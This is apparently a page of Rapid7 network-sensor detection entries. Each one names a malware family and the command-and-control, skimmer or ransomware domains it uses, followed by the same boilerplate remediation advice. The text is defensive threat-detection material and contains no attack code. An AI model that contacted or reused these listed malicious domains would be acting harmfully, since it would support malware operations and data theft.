Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Resource Hijacking - T1496

ET MALWARE Observed CoinMiner CnC Domain (endpsbn1u6m8f .x .pipedream .net in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Resource Hijacking - T1496

ET MALWARE Observed CoinMiner CnC Domain (enoyq5xy70oq .x .pipedream .net in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Resource Hijacking - T1496

ET MALWARE Observed Compromised Domain (cryptoarenastore .com in TLS SNI) (2021-11-12)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Cryptor Ransomware CnC Domain (e3kok4ekzalzapsf .onion .ws in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Observed DarkSide Ransomware CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Observed DarkSide Ransomware Domain (baroquetees .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Observed DarkSide Ransomware Domain (catsdegree .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Observed DarkSide Ransomware Domain (rumahsia .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Observed DarkSide Ransomware Domain (temisleyes .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Observed DCRat CnC Domain (dud-shotline .000webhostapp .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed DCRat CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed DecryptmyFiles Ransomware User-Agent (uniquesession)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Observed Default CobaltStrike SSL Certificate

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed ELF/HabitsRAT CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed ELF/HabitsRAT CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed ELF/HabitsRAT CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed ELF/HabitsRAT CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed ELF/HabitsRAT CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Elysium Stealer Domain in TLS SNI (download-serv-234116 .xyz)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Elysium Stealer Domain in TLS SNI (get-europe-group .bar)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Elysium Stealer Domain in TLS SNI (manholi .xyz)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Elysium Stealer Domain in TLS SNI (phonefix .bar)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Elysium Stealer Domain (phonefix .bar in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Evil Keitaro TDS Redirection Domain (fiberswatch .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Evrial Domain (cryptoclipper .ru in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Evrial Domain (projectevrial .ru in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed FIN7 CnC Domain (injuryless .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed FinSpy Domain (browserupdate .download in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Get2 CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Get2 CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed GET Request to Jaff Domain (orhangazitur . com)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Glupteba CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Glupteba CnC Domain (venoxcontrol .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed GoBotKR Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed GoBotKR Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed GoBotKR Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed GoBotKR Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed GoBotKR Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Godlua Backdoor Domain (c .cloudappconfig .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Godlua Backdoor Domain (c .heheda .tk in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Godlua Backdoor Domain (d .cloudappconfig .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Godlua Backdoor Domain (dd .cloudappconfig .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Godlua Backdoor Domain (dd .heheda .tk in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Godlua Backdoor Domain (d .heheda .tk in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Godlua Backdoor Domain (helegedada .github .io in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed GoLang Dropper Domain (en7dftkjiipor .x .pipedream .net in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed HTTP Request to Known PUA Host Domain

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed HTTP Request to Known PUA Host Domain

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed IcedID CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed IcedID CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed IcedID CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed IcedID CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed IcedID CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed IcedID CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed IcedID CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed IcedID CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed IcedID CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed IcedID CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed IcedID CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed IcedID CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed IcedID CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed IcedID CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed IcedID CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed IcedID CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed IcedID CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed IcedID CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed IcedID CnC Domain (nothingtodo .co in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed IcedID Domain (80frontluzkher .xyz in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed IcedID Domain (bruzilovv .top in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed IcedID Domain (deactivate .best in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed IcedID Domain (deactivate .pw in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed IcedID Domain (ldrtoyota .casa in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed JS/Magecart Domain in TLS SNI (manag .icu)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed JS/Skimmer (likely Magecart) Domain in TLS SNI (imprintcenter .com)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed JSSLoader Domain (deprivationant .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed JSSLoader Variant Domain (legislationient .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Jupyter Stealer CnC Domain (blackl1vesmatter .org in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Jupyter Stealer CnC Domain (gogohid .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Jupyter Stealer CnC Domain (vincentolife .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Karen Ransomware CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Observed Karen Ransomware Domain (karen .h07 .wlh .io in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Observed Karen Ransomware Powershell Loader

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Observed Koadic Header Structure

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Lazarus Maldoc CnC Domain (shopweblive .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Lunar Builder Domain (lunarbuilder .000webhostapp .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Magecart CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Magecart CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Magecart CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Magecart CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Magecart CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed MageCart CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed MageCart CnC Domain (mcdnn .me in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed MageCart CnC Domain (mcdnn .net in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Magecart Domain (webscriptly .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Magecart Exfil Domain (imags .pw in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed MageCart Group 12 Domain (pathc .space in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed MageCart Group 12 Domain (toolser .pw in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed MageCart Group 12 Domain (zolo .pw in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Magecart Skimmer Domain (analiticsweb .site in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Magecart Skimmer Domain (cloudflare-cdnjs .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Magecart Skimmer Domain (googie-analitycs .site in TLS SNI)

Description
Copy link

